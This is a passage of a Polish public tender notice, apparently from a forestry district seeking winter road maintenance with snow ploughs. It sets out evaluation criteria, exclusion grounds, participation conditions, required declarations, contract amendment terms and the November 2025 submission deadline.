pkt.<br/>5. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów wyliczoną zgodnie ze wzorem:<br/>O = C + G<br/>gdzie:<br/>O – suma punktów uzyskanych za wszystkie kryteria oceny<br/>C – liczba punktów w ramach kryterium „Cena”<br/>G – liczba punktów w kryterium „Samodzielna realizacja kluczowej części<br/>zamówienia”<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>6. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.<br/>8. Jeżeli zostanie złożona przez Wykonawcę oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku<br/>podatkowego zgodnie z ustawą z dnia<br/>11 marca 2004 r. o podatku od towarów i usług (Dz.U. z 2023 r. poz. 1570), dla celów zastosowania kryterium ceny Zamawiający<br/>doliczy do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć i tak uzyskaną cenę<br/>porówna z cenami innych ofert.<br/>OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT zawiera rozdział<br/>16 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">samodzielna realizacja kluczowych elememntów zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu.<br/>2. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dot. sytuacji ekonomicznej oraz do warunku dot. sytuacji finansowej.<br/>4) zdolności technicznej lub zawodowej:<br/>a) W zakresie doświadczenia.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>b) W zakresie osób skierowanych do realizacji zamówienia<br/>Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony,<br/>jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej 2 osobami do obsługi pojazdów mechanicznych<br/>z odpowiednimi uprawnieniami;<br/>c) W zakresie dysponowania potencjałem technicznym:<br/>Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje<br/>lub będzie dysponować co najmniej 2 zestawami – pojazd mechaniczny z pługiem śniegowym (lub wirnikowym) z<br/>możliwością uszorstniania nawierzchni przy użyciu urządzeń rozsypujących.<br/>3. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w<br/>oparciu o informacje zawarte w dokumentach lub oświadczeniach złożonych przez Wykonawców.<br/>4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W<br/>przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w<br/>pkt 5.2. powinni spełniać łącznie wszyscy Wykonawcy.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane.<br/>6. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z<br/>nimi stosunków prawnych.<br/>7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji, których te<br/>zdolności są wymagane.<br/>8. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>pkt. 5.2. ppkt 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane w pkt 6.1. i 6.2. SWZ względem Wykonawcy.<br/>9. Jeżeli zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający<br/>żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami<br/>albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>11. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>12. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że<br/>realizując zamówienie, faktycznie będzie dysponował zasobami tych podmiotów, w szczególności przedstawiając ich<br/>zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (przykładowy wzór<br/>zobowiązania stanowi zał. nr 3 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający żąda:<br/>a) ośw. wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp,<br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów<br/>( Dz.U. z 2023 r. poz. 1689), z innym wykonawcą, który złożył odrębną ofertę albo ośw. o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej (zał. 4 do SWZ );<br/>b) ośw. Wykonawcy o aktualności inf. zawartych<br/>w ośw. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp<br/>oraz art. 108 ust. 1 pkt 4 Pzp, dotyczącej orzeczenia zakazu ubiegania się o zam. publiczne tytułem środka karnego (zał. 9 do<br/>SWZ);*<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w ośw. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp,<br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2023 r. poz. 1689), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej (zał. 9 do SWZ);*<br/>d) ośw. Wykonawcy o aktualności inf. zawartych<br/>w ośw. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, że wykonawca nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp,<br/>a w przypadku zalegania z opłacaniem podatków lub opłat wraz<br/>z ośw. Zam. żąda złożenia ośw., że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności (zał. 9 do SWZ);*<br/>e) ośw. Wykonawcy o aktualności informacji zawartych<br/>w ośw. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z oświadczeniem zamawiający żąda złożenia oświadczenia, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności (zał. 9 do SWZ);*<br/>f) ośw. Wykonawcy o aktualności informacji zawartych<br/>w ośw. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie art. 109 ust. 1 pkt 4 ustawy (zał. 9<br/>do SWZ);<br/>g) ośw. wykonawcy o aktualności informacji zawartych w Ośw. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/>i. art. 108 ust. 1 pkt 1 PZP,<br/>ii. art. 108 ust. 1 pkt 2 PZP,<br/>iii. art. 108 ust. 1 pkt 3 PZP,<br/>iv. art. 108 ust. 1 pkt 4 PZP ,<br/>v. art. 108 ust. 1 pkt 5 PZP<br/>vi. art. 108 ust. 1 pkt 6 PZP,<br/>vii. art. 109 ust. 1 pkt 1 PZP, w tym również odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o<br/>których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz.U. z 2023 r. poz. 70),*<br/>viii. art. 109 ust. 1 pkt 4 Pzp,<br/>ix. art. 109 ust. 1 pkt 5, pkt 7-10 Pzp<br/>x. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2024 r., poz. 507).<br/>(zał. 9 do SWZ).<br/>INFORMACJE O PODMIOTOWYCH ŚRODKACH DOWODOWYCH I INNYCH DOKUMENTACH I OŚWIADCZENIACH zawiera<br/>rozdział 7 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej,<br/>Zamawiający żąda:<br/>a) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich uprawnień<br/>i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami - w zakresie niezbędnym do wykazania spełniania warunku udziału w<br/>postępowaniu, określonego w rozdz. 5 ust. 2. ppkt. 4) litr. b) niniejszego SWZ (wzór wykazu stanowi załącznik nr 6 do SWZ);<br/>b) wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o<br/>podstawie do dysponowania tymi zasobami – w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu,<br/>określonego w rozdz. 5 ust. 2. ppkt. 4) litr. c) niniejszego SWZ (wzór wykazu stanowi załącznik nr 7 do SWZ).<br/>INFORMACJE O PODMIOTOWYCH ŚRODKACH DOWODOWYCH I INNYCH DOKUMENTACH I OŚWIADCZENIACH zawiera<br/>rozdział 7 SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę Wykonawcy składają się:<br/>1) Formularz oferty, sporządzony zgodnie z treścią załącznika nr 1 do SWZ<br/>2) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego odpowiednio w rozdziale 6 ust. 1, ust. 2 i ust. 9 SWZ oraz w rozdziale 5 ust. 2 ppkt. 4 ) SWZ. Oświadczenie<br/>to stanowić będzie dowód, potwierdzający brak podstaw wykluczenia lub spełnianie warunków udziału w postępowaniu na<br/>dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe (zał. 2 do<br/>SWZ).<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu, o którym mowa powyżej, musi złożyć z osobna każdy z Wykonawców.<br/>Oświadczenia te mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, także oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby (zał. 2 do SWZ),<br/>4) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, ma obowiązek złożyć wraz z<br/>ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia” lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania innego podmiotu, określać,<br/>czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie będzie ono wykonywane.<br/>5) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawcy<br/>ma obowiązek złożyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>6) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu<br/>udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby, działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania Wykonawcy, Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby.<br/>Wykaz innych wymaganych oświadczeń lub dokumentów znajduje się w SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu, o którym mowa powyżej, musi złożyć z osobna każdy z Wykonawców.<br/>Oświadczenia te mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia wraz z<br/>oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, także oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby (wzór oświadczenia stanowi załącznik nr 2 do SWZ),<br/>4) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, ma obowiązek złożyć wraz z<br/>ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia” lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania innego podmiotu, określać,<br/>czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie będzie ono wykonywane.<br/>6) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu<br/>udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby, działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania Wykonawcy, Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby.<br/>Pełnomocnictwo powinno być złożone w oryginale w formie elektronicznej lub w postaci cyfrowego odwzorowania dokumentu sporządzonego w postaci papierowej (elektronicznej kopii), poświadczonej za zgodność z oryginałem przez<br/>mocodawcę albo notarialnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający wymaga zawarcia umowy według projektu, stanowiącego załącznik nr 8 do SWZ.<br/>2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.<br/>3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy. Zmiany mogą być wprowadzone w przypadku wystąpienia co najmniej jednej z<br/>wymienionych w projekcie umowy okoliczności oraz gdy zostaną uwzględnione, opisane w niej warunki wprowadzenia tych<br/>zmian.<br/>Zamawiający przewiduje możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie, której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z<br/>uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1. W przypadku zaistnienia przesłanek z art. 455 Ustawy Prawo zamówień publicznych.<br/>2. Zmiany powszechnie obowiązujących przepisów prawa a zakresie mającym wpływ na realizacje przedmiotu umowy<br/>3. Potrzeby wprowadzenia zmiany w sposobie realizacji przedmiotu umowy wynikającej z przyczyn zewnętrznych<br/>niezależnych od Zamawiającego oraz Wykonawcy skutkujących niemożliwością prowadzenia działań w celu wykonania<br/>umowy<br/>w dotychczasowy sposób.<br/>4. Zmiana terminu realizacji Przedmiotu Umowy w przypadku zaistnienia jednej lub kilku wymienionych poniżej okoliczności:<br/>1) okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy<br/>2) spowodowanych warunkami zewnętrznymi, w szczególności klęskami żywiołowymi lub faktycznym brakiem śniegu lub<br/>braku występowania śliskości w okresie realizacji przedmiotu Umowy;<br/>3) spowodowanych warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności odnalezieniem<br/>niewypałów i niewybuchów,<br/>4) będących następstwem zdarzeń leżących po stronie Zamawiającego, takich jak w szczególności wstrzymaniem prac z<br/>zakresu gospodarki leśnej przez Zamawiającego,<br/>5) jeżeli uzasadnione to będzie okolicznościami leżącymi po stronie Zamawiającego, w szczególności sytuacją finansową,<br/>zdolnościami płatniczymi lub warunkami organizacyjnymi, ograniczeniem lub zwiększeniem ilości prac z zakresu gospodarki<br/>leśnej;<br/>6) stanowiących inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością<br/>prowadzenia prac takie jak np. błędy oraz niedopatrzenia powstałe w wyniku działalności człowieka, których skutki mogą<br/>doprowadzić do znacznej modyfikacji pierwotnych założeń realizacji przedmiotu Umowy.<br/>5. Pozostałe zmiany:<br/>1) zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania Umowy<br/>po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy<br/>w kwocie podatku zapłaconego przez Wykonawcę,<br/>2) rezygnacja przez Zamawiającego z realizacji części przedmiotu Umowy. W takim przypadku wynagrodzenie<br/>przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia<br/>oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z Umowy planowanymi świadczeniami.<br/>6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią<br/>jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>7. Nie stanowi zmiany umowy:<br/>1) zmiany danych, związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego)<br/>2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-24 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_stuposiany</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-24 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje obowiązku przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego<br/>dokumentów niezbędnych do realizacji zamówienia.<br/>2. Zamawiający nie przewiduje przedstawiania przez Wykonawców ofert wariantowych.<br/>3. Zamawiający nie przewiduje żądania składania przedmiotowych środków dowodowych.<br/>4. Zamawiający nie przewiduje rozliczenia z Wykonawcą w walutach obcych.<br/>5. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.<br/>6. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>7. Zamawiający nie określa oraz nie nakłada do Wykonawcę osobistego wykonania kluczowych części przedmiotu<br/>zamówienia.<br/>Do formalności, jakie powinny zostać dopełnione przez Wykonawcę, którego ofertę wybrano, w celu zawarcia umowy (w<br/>formie pisemnej, pod rygorem nieważności) należą:<br/>1) wskazanie osób umocowanych do zawarcia umowy oraz złożenie oryginałów pełnomocnictw lub poświadczonych<br/>notarialnie za zgodność z oryginałem kopii pełnomocnictw, lub sporządzonych przez notariusza odpisów, lub wyciągów z<br/>pełnomocnictw, lub kopii pełnomocnictw poświadczonych za zgodność z oryginałem przez mocodawcę – o ile do zawarcia<br/>umowy przez wskazaną osobę wymagane będzie pełnomocnictwo;<br/>2) przedstawienie Zamawiającemu do wglądu dokumentów poświadczających posiadanie przez wskazane osoby<br/>wymaganych kwalifikacji i uprawnień.<br/>3) dostarczenie Zamawiającemu potwierdzonej za zgodność z oryginałem kopii umowy regulującej współpracę podmiotów<br/>składających wspólną ofertę – dotyczy Wykonawców, którzy wspólnie uzyskali zamówienie (tzw. konsorcjum), zawierającej,<br/>co najmniej: wskazanie Wykonawców, zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego<br/>swoim zakresem realizację przedmiotu zamówienia, określenie zakresu działania poszczególnych stron umowy, czas<br/>obowiązywania umowy, który nie może być krótszy, niż okres realizacji robót budowlanych;<br/>4) przedłożenie Zamawiającemu do wglądu umów o pracę osób wykonujących czynności związane z zamówieniem. Kopia<br/>umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie<br/>z przepisami o ochronie danych osobowych, przy czym imię i nazwisko pracownika nie podlega anonimizacji, a także<br/>informacje takie jak data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;<br/>5) przedłożenie Zamawiającemu projektu umowy, jaką Wykonawca zamierza zawrzeć z podwykonawcą celem jej akceptacji<br/>– jeżeli Wykonawca wskazał w ofercie, że część zamówienia zostanie powierzona podwykonawcy;<br/>6) dokument potwierdzający posiadanie ubezpieczenia od odpowiedzialności cywilnej określony w projekcie umowy w<br/>sprawie zamówienia publicznego (załącznik nr 8 do SWZ) w wysokości: nie mniejszą niż 60 000,00 zł.<br/>Niedopełnienie wskazanych formalności będzie traktowane jako uchylanie się przez Wykonawcę od zawarcia umowy w<br/>sprawie zamówienia publicznego.<br/>Ze względu na ograniczenia znakowe prosimy zapoznać się z pełną treścią specyfikacji<br/>warunków zamówienia SWZ, która umieszczona jest na stronie https://platformazakupowa.pl/pn/lasy_stuposiany<br/>POUCZENIE O ŚRODKACH 